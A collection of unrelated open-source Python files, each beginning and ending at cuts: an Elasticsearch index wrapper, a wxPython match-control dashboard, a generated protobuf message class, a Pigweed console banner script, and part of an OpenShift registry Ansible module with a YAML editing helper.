        if profiles_by_user_id is not None:
            # Users with no custom field values get an empty dict, not None.
            custom_profile_field_data = profiles_by_user_id.get(row["id"], {})

        result[row["id"]] = format_user_row(
            realm,
            acting_user=acting_user,
            row=row,
            client_gravatar=client_gravatar,
            user_avatar_url_field_optional=user_avatar_url_field_optional,
            custom_profile_field_data=custom_profile_field_data,
        )
    return result

# Copyright 2013 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals

import hashlib
import os

from elasticsearch import Elasticsearch, TransportError
from elasticsearch.helpers import bulk_index

from warehouse.utils import AttributeDict


class Index(object):
    """Wrapper around the Elasticsearch cluster holding the Warehouse
    search index and its registered document types."""

    _index = "warehouse"

    def __init__(self, models, config):
        self.models = models
        self.config = config
        self.es = Elasticsearch(
            hosts=self.config.hosts,
            **self.config.get("client_options", {})
        )

        # Mapping of document type name -> registered type instance.
        self.types = AttributeDict()

    def register(self, type_):
        """Instantiate and register a document type with this index."""
        obj = type_(self)
        self.types[obj._type] = obj

    def reindex(self, index=None, alias=True, keep_old=False):
        """Build a fresh index, fill it, and (optionally) repoint the alias.

        A random suffix keeps each rebuild's name unique so the alias
        can be swapped between the old and new indexes.
        """
        # Generate an Index Name for Warehouse
        index = "".join([
            index if index is not None else self._index,
            hashlib.md5(os.urandom(16)).hexdigest()[:8],
        ])

        # Create this index with a mapping for every registered type
        self.es.indices.create(index, {
            "mappings": {
                doc_type._type: doc_type.get_mapping()
                for doc_type in self.types.values()
            },
        })

        # Index everything into the new index
        for doc_type in self.types.values():
            doc_type.index_all(index=index)

        # Update the alias unless we've been told not to
        if alias:
            self.update_alias(self._index, index, keep_old=keep_old)

    def update_alias(self, alias, index, keep_old=False):
        """Point ``alias`` at ``index``, deleting the previously aliased
        index unless ``keep_old`` is true."""
        # Get the index the alias currently points at, if any.
        try:
            # Fixes: query the ``alias`` parameter (the old code always
            # queried self._index, ignoring the argument), and avoid
            # subscripting dict.keys(), which fails on Python 3.
            old_index = next(iter(self.es.indices.get_alias(alias)))
        except TransportError as exc:
            if exc.status_code != 404:
                raise
            old_index = None

        # Remove the alias from the old index if it exists
        actions = []
        if old_index is not None:
            actions.append({"remove": {"index": old_index, "alias": alias}})

        # Add the alias to the new index
        actions.append({"add": {"index": index, "alias": alias}})

        # Update To the New Index
        self.es.indices.update_aliases({"actions": actions})

        # Delete the old index if it exists and unless we're keeping it
        if not keep_old and old_index is not None:
            self.es.indices.delete(old_index)


class BaseMapping(object):
    """Common behavior for search document types; subclasses describe
    how to map, enumerate, identify, and serialize their items."""

    SEARCH_LIMIT = 25

    def __init__(self, index):
        self.index = index

    def get_mapping(self):
        """Return the Elasticsearch mapping for this document type."""
        raise NotImplementedError

    def get_indexable(self):
        """Return an iterable of every item to be indexed."""
        raise NotImplementedError

    def extract_id(self, item):
        """Return the unique document ID for *item*."""
        raise NotImplementedError

    def extract_document(self, item):
        """Return the document body for *item*."""
        raise NotImplementedError

    def index_all(self, index=None):
        """Bulk-index every indexable item into *index* (defaults to the
        owning Index's name)."""
        target = self.index._index if index is None else index

        documents = (
            {
                "_index": target,
                "_type": self._type,
                "_id": self.extract_id(item),
                "_source": self.extract_document(item),
            }
            for item in self.get_indexable()
        )
        bulk_index(self.index.es, list(documents))

    def search(self, query):
        """Run *query* against this document type; subclass responsibility."""
        raise NotImplementedError

#!/usr/bin/python2.7
from __future__ import print_function
# -*- coding: utf-8 -*-

import wx
import threading
import lcm
import random
import Forseti
import configurator

# Alliance background colours for team panels (RGB tuples).
BLUE = (24, 25, 141)
GOLD = (241, 169, 50)

class TeamPanel(wx.Panel):
    """Panel showing one team's letter, number, and name, with a 'Get'
    button that fetches the team name from the configurator by number."""

    def __init__(self, remote, letter, number, name, colour, *args, **kwargs):
        super(TeamPanel, self).__init__(*args, **kwargs) 
        self.remote = remote
        self.InitUI(letter, number, name, colour)

    def InitUI(self, letter, number, name, colour=None):
        # Colour the panel by alliance (BLUE/GOLD) when given.
        if colour is not None:
            self.SetBackgroundColour(colour)

        # Size the controls relative to screen character metrics.
        dc = wx.ScreenDC()
        self.num_ctrl = wx.TextCtrl(self, size=(dc.GetCharWidth() * 2, dc.GetCharHeight()))
        self.num_ctrl.AppendText(str(number))
        self.get_button = wx.Button(self, label='Get', size=(dc.GetCharWidth() * 2, dc.GetCharHeight()))
        self.get_button.Bind(wx.EVT_BUTTON, self.do_get_name)
        self.name_ctrl = wx.TextCtrl(self, size=(dc.GetCharWidth() * 16,
            dc.GetCharHeight()))
        self.name_ctrl.AppendText(name)

        # Single row: letter label, number box, Get button, name box.
        name_num_box = wx.BoxSizer(wx.HORIZONTAL)
        name_num_box.Add(wx.StaticText(self, label=letter,
            size=(dc.GetCharWidth() * 0.6, dc.GetCharHeight())))
        name_num_box.Add(self.num_ctrl)
        name_num_box.Add(self.get_button)
        name_num_box.Add(self.name_ctrl)

        #button_box = wx.BoxSizer(wx.HORIZONTAL)
        #button_box.Add(wx.Button(self, label='Reset'))
        #button_box.Add(wx.Button(self, label='Configure'))
        #button_box.Add(wx.Button(self, label='Disable'))

        self.vbox = wx.BoxSizer(wx.VERTICAL)
        self.vbox.Add(name_num_box, flag=wx.CENTER)
        #vbox.Add(button_box, flag=wx.CENTER)

        self.SetSizer(self.vbox)
        self.Show(True)

    def do_get_name(self, event):
        # Look up the team name for the currently entered team number.
        self.name = configurator.get_team_name(self.number)

    @property
    def name(self):
        """Team name currently shown in the name text control."""
        return self.name_ctrl.GetValue()

    @name.setter
    def name(self, val):
        self.name_ctrl.SetValue(val)

    @property
    def number(self):
        """Team number from the text control; 0 if not a valid integer."""
        try:
            return int(self.num_ctrl.GetValue())
        except ValueError:
            return 0

    @number.setter
    def number(self, val):
        self.num_ctrl.SetValue(str(val))

class MatchControl(wx.Panel):
    """Panel for configuring and running a single match: four team
    panels, the match number, and Init/GO/Pause controls."""

    def __init__(self, remote, *args, **kwargs):
        super(MatchControl, self).__init__(*args, **kwargs) 
        self.remote = remote
        self.InitUI()

    def InitUI(self):
        vbox = wx.BoxSizer(wx.VERTICAL)

        dc = wx.ScreenDC()
        match_number = wx.BoxSizer(wx.HORIZONTAL)
        match_number.Add(wx.StaticText(self, label='Match #'.format(1)))
        self.match_num_ctrl = wx.TextCtrl(self, size=(dc.GetCharWidth() * 2,
            dc.GetCharHeight()))
        match_number.Add(self.match_num_ctrl)
        vbox.Add(match_number, flag=wx.CENTER)

        # Panels are created in display order (A, C, B, D) so the 2-column
        # grid shows blue (A/B) on the left and gold (C/D) on the right.
        teamSizer = wx.GridSizer(3, 2)
        self.team_panels = [
            TeamPanel(self.remote, 'A', 0, 'Unknown Team', BLUE, self),
            TeamPanel(self.remote, 'C', 0, 'Unknown Team', GOLD, self),
            TeamPanel(self.remote, 'B', 0, 'Unknown Team', BLUE, self),
            TeamPanel(self.remote, 'D', 0, 'Unknown Team', GOLD, self),
            ]
        teamSizer.AddMany(
                [wx.StaticText(self, label='Blue Team'),
                 wx.StaticText(self, label='Gold Team')] +
                [(panel, 0) for panel in self.team_panels])
        vbox.Add(teamSizer, flag=wx.CENTER)

        buttons = wx.BoxSizer(wx.HORIZONTAL)
        self.init_button = wx.Button(self, label='Init')
        self.init_button.Bind(wx.EVT_BUTTON, self.do_init)
        self.go_button = wx.Button(self, label='GO!')
        self.go_button.Bind(wx.EVT_BUTTON, self.do_go)
        self.pause_button = wx.Button(self, label='Pause')
        self.pause_button.Bind(wx.EVT_BUTTON, self.do_pause)
        #self.save_button = wx.Button(self, label='Save')
        #self.save_button.Bind(wx.EVT_BUTTON, self.do_save)
        self.time_text = wx.StaticText(self, label='0:00')
        self.stage_text = wx.StaticText(self, label='Unknown')
        # Give the remote a direct handle on the clock display.
        self.remote.time_text = self.time_text
        #buttons.Add(self.save_button, flag=wx.LEFT)
        buttons.Add(self.init_button)
        buttons.Add(self.go_button)
        buttons.Add(self.pause_button)
        buttons.Add(self.time_text)
        buttons.Add(self.stage_text)
        vbox.Add(buttons, flag=wx.CENTER)

        self.SetSizer(vbox)
        self.Show(True)

    def do_go(self, e):
        self.remote.do_go()

    def do_pause(self, e):
        self.remote.do_pause()

    def do_save(self, e):
        self.remote.do_save(self.get_match())

    def do_init(self, e):
        self.remote.do_init(self.get_match())

    def _set_match_panel(self, match, team_idx, panel_idx):
        # Copy one panel's fields into the match message.
        match.team_numbers[team_idx] = self.team_panels[panel_idx].number
        match.team_names[team_idx] = self.team_panels[panel_idx].name

    def _set_panel_match(self, match, team_idx, panel_idx):
        # Copy one team's fields from the match message into a panel.
        self.team_panels[panel_idx].number = match.team_numbers[team_idx] 
        self.team_panels[panel_idx].name = match.team_names[team_idx] 

    def get_match(self):
        """Build a Forseti.Match from the current control values.

        Match indices 0-3 map to panels 0/2/1/3 because the panels list
        is in A, C, B, D display order.
        """
        match = Forseti.Match()
        self._set_match_panel(match, 0, 0)
        self._set_match_panel(match, 1, 2)
        self._set_match_panel(match, 2, 1)
        self._set_match_panel(match, 3, 3)
        try:
            match.match_number = int(self.match_num_ctrl.GetValue())
        except ValueError:
            # No/invalid number entered: fall back to a random 31-bit ID.
            match.match_number = random.getrandbits(31)
        return match

    def set_match(self, match):
        """Populate the controls from a match message (inverse of get_match)."""
        self._set_panel_match(match, 0, 0)
        self._set_panel_match(match, 1, 2)
        self._set_panel_match(match, 2, 1)
        self._set_panel_match(match, 3, 3)
        self.match_num_ctrl.SetValue(str(match.match_number))

    def set_time(self, match):
        # NOTE(review): format_time is not defined anywhere in this part
        # of the module — confirm it exists later in the file, otherwise
        # this raises NameError at runtime.
        self.time_text.SetLabel(format_time(match.game_time_so_far))
        self.stage_text.SetLabel(match.stage_name)


class ScheduleControl(wx.Panel):
    """Panel listing scheduled matches; selecting one loads it into the
    match control."""

    def __init__(self, remote, match_control, *args, **kwargs):
        self.remote = remote
        super(ScheduleControl, self).__init__(*args, **kwargs)
        self.InitUI()
        # Let the remote populate the list box with schedule updates.
        self.remote.match_list_box = self.match_list
        self.match_control = match_control

    def InitUI(self):
        self.match_list = wx.ListBox(self)
        self.match_list.Bind(wx.EVT_LISTBOX, self.choose_match)
        hbox = wx.BoxSizer(wx.HORIZONTAL)
        self.load_button = wx.Button(self, label='Load All')
        self.load_button.Bind(wx.EVT_BUTTON, self.do_load)
        hbox.Add(self.load_button)
        self.clear_first = wx.CheckBox(self, label='Clear first')
        self.clear_first.SetValue(True)
        hbox.Add(self.clear_first)

        vbox = wx.BoxSizer(wx.VERTICAL)
        vbox.Add(self.match_list, 1, wx.EXPAND)
        vbox.Add(hbox)

        self.SetSizer(vbox)
        self.Show(True)

    def do_load(self, e):
        # Request the full schedule, optionally clearing the list first.
        self.remote.do_load(self.clear_first.GetValue())

    def choose_match(self, event):
        # The selected list item's client data is the match object itself.
        self.match_control.set_match(event.GetClientData())


class MainWindow(wx.Frame):
    """Top-level frame holding the match editor and the schedule list."""

    def __init__(self, remote, *args, **kwargs):
        super(MainWindow, self).__init__(*args, **kwargs)
        self.remote = remote
        self.InitUI()

    def InitUI(self):
        # File menu with a single Quit entry.
        menubar = wx.MenuBar()
        fileMenu = wx.Menu()
        fitem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')
        menubar.Append(fileMenu, '&File')
        self.SetMenuBar(menubar)
        self.Bind(wx.EVT_MENU, self.OnQuit, fitem)

        match_control = MatchControl(self.remote, self)
        schedule_control = ScheduleControl(self.remote, match_control, self)
        self.remote.match_control = match_control

        layout = wx.BoxSizer(wx.VERTICAL)
        layout.Add(match_control, 0, wx.ALIGN_CENTER | wx.ALIGN_TOP, 8)
        layout.Add(schedule_control, 1, wx.EXPAND | wx.ALIGN_CENTER | wx.ALL, 8)

        self.SetSize((800, 600))
        self.SetSizer(layout)
        self.SetTitle('Forseti Dashboard')
        self.Centre()
        self.Show(True)

    def OnQuit(self, e):
        self.Close()

def format_match(match):
    """Return a one-line description of *match* for the schedule list box.

    Expects `match` to expose `match_number` plus four-element
    `team_names` / `team_numbers` sequences.
    """
    # Debug prints removed: this runs once per schedule entry and spammed
    # stdout on every schedule reload.
    return '{}: {} ({}) & {} ({}) vs. {} ({}) & {} ({})'.format(
        match.match_number,
        match.team_names[0], match.team_numbers[0],
        match.team_names[1], match.team_numbers[1],
        match.team_names[2], match.team_numbers[2],
        match.team_names[3], match.team_numbers[3],
        )

class Remote(object):
    """Bridge between the LCM message bus and the wx UI.

    Subscribes to schedule and timer channels and publishes control
    commands.  LCM callbacks fire on a background daemon thread, so all
    widget mutations are marshalled onto the wx main thread with
    wx.CallAfter (wx widgets are not thread-safe).
    """

    def __init__(self):
        self.lc = lcm.LCM('udpm://239.255.76.67:7667?ttl=1')
        self.lc.subscribe('Schedule/Schedule', self.handle_schedule)
        self.lc.subscribe('Timer/Time', self.handle_time)
        # Wired up by the UI after construction.
        self.match_list_box = None
        self.match_control = None
        self.thread = threading.Thread(target=self._loop)
        self.thread.daemon = True

    def start(self):
        """Start handling LCM messages on the background daemon thread."""
        self.thread.start()

    def _loop(self):
        # Handle messages forever; swallow per-message errors so one bad
        # message doesn't kill the listener thread.
        while True:
            try:
                self.lc.handle()
            except Exception as ex:
                print('Got exception while handling lcm message', ex)

    def handle_schedule(self, channel, data):
        """Populate the schedule list box from a Schedule message."""
        msg = Forseti.Schedule.decode(data)
        for i in range(msg.num_matches):
            # Fix: Insert must run on the wx main thread — this callback
            # fires on the LCM listener thread (handle_time already did
            # this correctly via wx.CallAfter).
            wx.CallAfter(self.match_list_box.Insert,
                         format_match(msg.matches[i]), i, msg.matches[i])

    def handle_time(self, channel, data):
        """Forward timer updates to the match control on the UI thread."""
        msg = Forseti.Time.decode(data)
        wx.CallAfter(self.match_control.set_time, msg)

    def do_load(self, clear_first):
        """Ask the scheduler for the match list, optionally clearing first."""
        if clear_first:
            self.match_list_box.Clear()
        msg = Forseti.ScheduleLoadCommand()
        msg.clear_first = clear_first
        print('Requesting load')
        self.lc.publish('Schedule/Load', msg.encode())

    def do_save(self, match):
        """Publish a match definition for persistence."""
        self.lc.publish('Match/Save', match.encode())

    def do_init(self, match):
        """Publish a request to initialize the field for *match*."""
        self.lc.publish('Match/Init', match.encode())

    def do_time_ctrl(self, command):
        """Send a named command (e.g. 'start', 'pause') to the timer."""
        msg = Forseti.TimeControl()
        msg.command_name = command
        self.lc.publish('Timer/Control', msg.encode())

    def do_go(self):
        self.do_time_ctrl('start')

    def do_pause(self):
        self.do_time_ctrl('pause')

def format_time(seconds):
    """Render a seconds count as M:SS (seconds zero-padded to two digits)."""
    minutes, secs = divmod(seconds, 60)
    return '{}:{:02}'.format(minutes, secs)


def main():
    """Build the dashboard UI, start the LCM listener, run the event loop."""
    app = wx.App()
    remote = Remote()
    MainWindow(remote, None)
    remote.start()
    # Prime the schedule list without clearing it first.
    remote.do_load(False)
    app.MainLoop()


# Launch the dashboard when executed as a script.
if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto  # type: ignore


# Register this module's message types under the v1 AI Platform proto package.
__protobuf__ = proto.module(
    package="google.cloud.aiplatform.v1", manifest={"SpecialistPool",},
)


class SpecialistPool(proto.Message):
    r"""SpecialistPool represents customers' own workforce to work on
    their data labeling jobs. It includes a group of specialist
    managers and workers. Managers are responsible for managing the
    workers in this pool as well as customers' data labeling jobs
    associated with this pool. Customers create specialist pool as
    well as start data labeling jobs on Cloud, managers and workers
    handle the jobs using CrowdCompute console.

    Attributes:
        name (str):
            Required. The resource name of the
            SpecialistPool.
        display_name (str):
            Required. The user-defined name of the
            SpecialistPool. The name can be up to 128
            characters long and can be consist of any UTF-8
            characters.
            This field should be unique on project-level.
        specialist_managers_count (int):
            Output only. The number of managers in this
            SpecialistPool.
        specialist_manager_emails (Sequence[str]):
            The email addresses of the managers in the
            SpecialistPool.
        pending_data_labeling_jobs (Sequence[str]):
            Output only. The resource name of the pending
            data labeling jobs.
        specialist_worker_emails (Sequence[str]):
            The email addresses of workers in the
            SpecialistPool.
    """

    # Generated proto-plus field declarations; the numbers are wire-format
    # field tags and must not be changed.
    name = proto.Field(proto.STRING, number=1,)
    display_name = proto.Field(proto.STRING, number=2,)
    specialist_managers_count = proto.Field(proto.INT32, number=3,)
    specialist_manager_emails = proto.RepeatedField(proto.STRING, number=4,)
    pending_data_labeling_jobs = proto.RepeatedField(proto.STRING, number=5,)
    # NOTE(review): field number 6 is skipped — presumably reserved/removed
    # in the upstream proto definition; do not reuse it. TODO confirm.
    specialist_worker_emails = proto.RepeatedField(proto.STRING, number=7,)


# Export exactly the message names registered in the proto manifest above.
__all__ = tuple(sorted(__protobuf__.manifest))

# -*- coding: utf-8 -*-

# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Prints the env_setup banner for cmd.exe.

This is done from Python as activating colors and printing ASCII art are not
easy to do in cmd.exe. Activated colors also don't persist in the parent
process.
"""

from __future__ import print_function

import argparse
import os
import sys

from .colors import Color, enable_colors  # type: ignore

# "PIGWEED" rendered in unicode block glyphs; printed by print_banner().
_PIGWEED_BANNER = u'''
 ▒█████▄   █▓  ▄███▒  ▒█    ▒█ ░▓████▒ ░▓████▒ ▒▓████▄
  ▒█░  █░ ░█▒ ██▒ ▀█▒ ▒█░ █ ▒█  ▒█   ▀  ▒█   ▀  ▒█  ▀█▌
  ▒█▄▄▄█░ ░█▒ █▓░ ▄▄░ ▒█░ █ ▒█  ▒███    ▒███    ░█   █▌
  ▒█▀     ░█░ ▓█   █▓ ░█░ █ ▒█  ▒█   ▄  ▒█   ▄  ░█  ▄█▌
  ▒█      ░█░ ░▓███▀   ▒█▓▀▓█░ ░▓████▒ ░▓████▒ ▒▓████▀
'''


def print_banner(bootstrap, no_shell_file):
    """Print the Pigweed or project-specific banner"""
    enable_colors()

    print(Color.green('\n  WELCOME TO...'))
    print(Color.magenta(_PIGWEED_BANNER))

    if bootstrap:
        print(Color.green('\n  BOOTSTRAP! Bootstrap may take a few minutes; '
                          'please be patient'))
        print(Color.green(
            '  On Windows, this stage is extremely slow (~10 minutes).\n'))
        return 0

    print(Color.green(
        '\n  ACTIVATOR! This sets your console environment variables.\n'))

    if no_shell_file:
        # Activation was attempted before bootstrap ever ran.
        print(Color.bold_red('Error!\n'))
        print(Color.red('  Your Pigweed environment does not seem to be'
                        ' configured.'))
        print(Color.red('  Run bootstrap.bat to perform initial setup.'))

    return 0


def parse():
    """Parse command-line arguments."""
    parser = argparse.ArgumentParser()
    # Both options are simple on/off flags.
    for flag in ('--bootstrap', '--no-shell-file'):
        parser.add_argument(flag, action='store_true')
    return parser.parse_args()


def main():
    """Script entry point."""
    # Only meaningful on Windows cmd.exe; report failure elsewhere.
    if os.name == 'nt':
        return print_banner(**vars(parse()))
    return 1


if __name__ == '__main__':
    sys.exit(main())

#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
#     ___ ___ _  _ ___ ___    _ _____ ___ ___
#    / __| __| \| | __| _ \  /_\_   _| __|   \
#   | (_ | _|| .` | _||   / / _ \| | | _|| |) |
#    \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
#   |   \ / _ \  | \| |/ _ \_   _| | __|   \_ _|_   _|
#   | |) | (_) | | .` | (_) || |   | _|| |) | |  | |
#   |___/ \___/  |_|\_|\___/ |_|   |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
   OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines

from __future__ import print_function
import atexit
import copy
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
    import ruamel.yaml as yaml
except ImportError:
    import yaml

from ansible.module_utils.basic import AnsibleModule

# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: doc/registry -*- -*- -*-

DOCUMENTATION = '''
---
module: oc_adm_registry
short_description: Module to manage openshift registry
description:
  - Manage openshift registry programmatically.
options:
  state:
    description:
    - The desired action when managing openshift registry
    - present - update or create the registry
    - absent - tear down the registry service and deploymentconfig
    - list - returns the current representation of a registry
    required: false
    default: False
    aliases: []
  kubeconfig:
    description:
    - The path for the kubeconfig file to use for authentication
    required: false
    default: /etc/origin/master/admin.kubeconfig
    aliases: []
  debug:
    description:
    - Turn on debug output.
    required: false
    default: False
    aliases: []
  name:
    description:
    - The name of the registry
    required: false
    default: None
    aliases: []
  namespace:
    description:
    - The selector when filtering on node labels
    required: false
    default: None
    aliases: []
  images:
    description:
    - The image to base this registry on - ${component} will be replaced with --type
    required: false
    default: 'openshift3/ose-${component}:${version}'
    aliases: []
  latest_images:
    description:
    - If true, attempt to use the latest image for the registry instead of the latest release.
    required: false
    default: False
    aliases: []
  labels:
    description:
    - A set of labels to uniquely identify the registry and its components.
    required: false
    default: None
    aliases: []
  enforce_quota:
    description:
    - If set, the registry will refuse to write blobs if they exceed quota limits
    required: False
    default: False
    aliases: []
  mount_host:
    description:
    - If set, the registry volume will be created as a host-mount at this path.
    required: False
    default: False
    aliases: []
  ports:
    description:
    - A comma delimited list of ports or port pairs to expose on the registry pod.  The default is set for 5000.
    required: False
    default: [5000]
    aliases: []
  replicas:
    description:
    - The replication factor of the registry; commonly 2 when high availability is desired.
    required: False
    default: 1
    aliases: []
  selector:
    description:
    - Selector used to filter nodes on deployment. Used to run registries on a specific set of nodes.
    required: False
    default: None
    aliases: []
  service_account:
    description:
    - Name of the service account to use to run the registry pod.
    required: False
    default: 'registry'
    aliases: []
  tls_certificate:
    description:
    - An optional path to a PEM encoded certificate (which may contain the private key) for serving over TLS
    required: false
    default: None
    aliases: []
  tls_key:
    description:
    - An optional path to a PEM encoded private key for serving over TLS
    required: false
    default: None
    aliases: []
  volume_mounts:
    description:
    - The volume mounts for the registry.
    required: false
    default: None
    aliases: []
  daemonset:
    description:
    - Use a daemonset instead of a deployment config.
    required: false
    default: False
    aliases: []
  edits:
    description:
    - A list of modifications to make on the deploymentconfig
    required: false
    default: None
    aliases: []
  env_vars:
    description:
    - A dictionary of modifications to make on the deploymentconfig. e.g. FOO: BAR
    required: false
    default: None
    aliases: []
  force:
    description:
    - Force a registry update.
    required: false
    default: False
    aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''

EXAMPLES = '''
- name: create a secure registry
  oc_adm_registry:
    name: docker-registry
    service_account: registry
    replicas: 2
    namespace: default
    selector: type=infra
    images: "registry.ops.openshift.com/openshift3/ose-${component}:${version}"
    env_vars:
      REGISTRY_CONFIGURATION_PATH: /etc/registryconfig/config.yml
      REGISTRY_HTTP_TLS_CERTIFICATE: /etc/secrets/registry.crt
      REGISTRY_HTTP_TLS_KEY: /etc/secrets/registry.key
      REGISTRY_HTTP_SECRET: supersecret
    volume_mounts:
    - path: /etc/secrets
      name: dockercerts
      type: secret
      secret_name: registry-secret
    - path: /etc/registryconfig
      name: dockersecrets
      type: secret
      secret_name: docker-registry-config
    edits:
    - key: spec.template.spec.containers[0].livenessProbe.httpGet.scheme
      value: HTTPS
      action: put
    - key: spec.template.spec.containers[0].readinessProbe.httpGet.scheme
      value: HTTPS
      action: put
    - key: spec.strategy.rollingParams
      value:
        intervalSeconds: 1
        maxSurge: 50%
        maxUnavailable: 50%
        timeoutSeconds: 600
        updatePeriodSeconds: 1
      action: put
    - key: spec.template.spec.containers[0].resources.limits.memory
      value: 2G
      action: update
    - key: spec.template.spec.containers[0].resources.requests.memory
      value: 1G
      action: update

  register: registryout

'''

# -*- -*- -*- End included fragment: doc/registry -*- -*- -*-

# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-


class YeditException(Exception):  # pragma: no cover
    '''Exception raised for any error while loading or editing yaml.'''


# pylint: disable=too-many-public-methods
class Yedit(object):  # pragma: no cover
    ''' Class to modify yaml files '''
    # The '{}' placeholder is filled (via str.format in parse_key/valid_key)
    # with the separator characters NOT currently in use, so keys may embed
    # them literally.  Fix: re_valid_key previously contained '%s', which
    # str.format never substitutes — the extra separators were silently left
    # out of validation while re_key (using '{}') included them.
    re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z{}/_-]+)).?)+$"
    re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
    com_sep = set(['.', '#', '|', ':'])

    # pylint: disable=too-many-arguments
    def __init__(self,
                 filename=None,
                 content=None,
                 content_type='yaml',
                 separator='.',
                 backup=False):
        '''Create a Yedit wrapper.

        filename: path of the yaml/json file to read/write (may be None)
        content: pre-parsed dict, or a raw string, used instead of the file
        content_type: 'yaml' or 'json'
        separator: character separating segments in keys (e.g. 'a.b.c')
        backup: when True, write() first copies the file to <filename>.orig
        '''
        self.content = content
        self._separator = separator
        self.filename = filename
        self.__yaml_dict = content
        self.content_type = content_type
        self.backup = backup
        # Parse immediately so yaml_dict is usable right after construction.
        self.load(content_type=self.content_type)
        if self.__yaml_dict is None:
            self.__yaml_dict = {}

    # `separator` is the character splitting key paths into segments
    # (default '.'; see parse_key/valid_key).
    @property
    def separator(self):
        ''' getter method for separator '''
        return self._separator

    @separator.setter
    def separator(self, inc_sep):
        ''' setter method for separator '''
        self._separator = inc_sep

    # `yaml_dict` holds the parsed document; the name-mangled backing
    # attribute (_Yedit__yaml_dict) is initialized in __init__.
    @property
    def yaml_dict(self):
        ''' getter method for yaml_dict '''
        return self.__yaml_dict

    @yaml_dict.setter
    def yaml_dict(self, value):
        ''' setter method for yaml_dict '''
        self.__yaml_dict = value

    @staticmethod
    def parse_key(key, sep='.'):
        '''parse the key allowing the appropriate separator'''
        common_separators = list(Yedit.com_sep - set([sep]))
        return re.findall(Yedit.re_key.format(''.join(common_separators)), key)

    @staticmethod
    def valid_key(key, sep='.'):
        '''validate the incoming key'''
        common_separators = list(Yedit.com_sep - set([sep]))
        if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
            return False

        return True

    @staticmethod
    def remove_entry(data, key, sep='.'):
        ''' remove data at location key '''
        if key == '' and isinstance(data, dict):
            data.clear()
            return True
        elif key == '' and isinstance(data, list):
            del data[:]
            return True

        if not (key and Yedit.valid_key(key, sep)) and \
           isinstance(data, (list, dict)):
            return None

        key_indexes = Yedit.parse_key(key, sep)
        for arr_ind, dict_key in key_indexes[:-1]:
            if dict_key and isinstance(data, dict):
                data = data.get(dict_key)
            elif (arr_ind and isinstance(data, list) and
                  int(arr_ind) <= len(data) - 1):
                data = data[int(arr_ind)]
            else:
                return None

        # process last index for remove
        # expected list entry
        if key_indexes[-1][0]:
            if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:  # noqa: E501
                del data[int(key_indexes[-1][0])]
                return True

        # expected dict entry
        elif key_indexes[-1][1]:
            if isinstance(data, dict):
                del data[key_indexes[-1][1]]
                return True

    @staticmethod
    def add_entry(data, key, item=None, sep='.'):
        ''' Set `item` at dict-notation `key` (a.b.c), creating intermediate
            dicts as needed.
            e.g. data = {}, key = a#b (sep='#'), item = c
                 -> data becomes {'a': {'b': 'c'}}
            Returns the stored value; returns None for an invalid key;
            raises YeditException when the path collides with an existing
            non-container value or a missing list index.
        '''
        if key == '':
            pass
        elif (not (key and Yedit.valid_key(key, sep)) and
              isinstance(data, (list, dict))):
            return None

        key_indexes = Yedit.parse_key(key, sep)
        # Walk to the parent of the final segment, creating missing dict
        # levels along the way.
        for arr_ind, dict_key in key_indexes[:-1]:
            if dict_key:
                if isinstance(data, dict) and dict_key in data and data[dict_key]:  # noqa: E501
                    data = data[dict_key]
                    continue

                elif data and not isinstance(data, dict):
                    raise YeditException("Unexpected item type found while going through key " +
                                         "path: {} (at key: {})".format(key, dict_key))

                data[dict_key] = {}
                data = data[dict_key]

            elif (arr_ind and isinstance(data, list) and
                  int(arr_ind) <= len(data) - 1):
                data = data[int(arr_ind)]
            else:
                raise YeditException("Unexpected item type found while going through key path: {}".format(key))

        if key == '':
            data = item

        # process last index for add
        # expected list entry
        elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:  # noqa: E501
            data[int(key_indexes[-1][0])] = item

        # expected dict entry
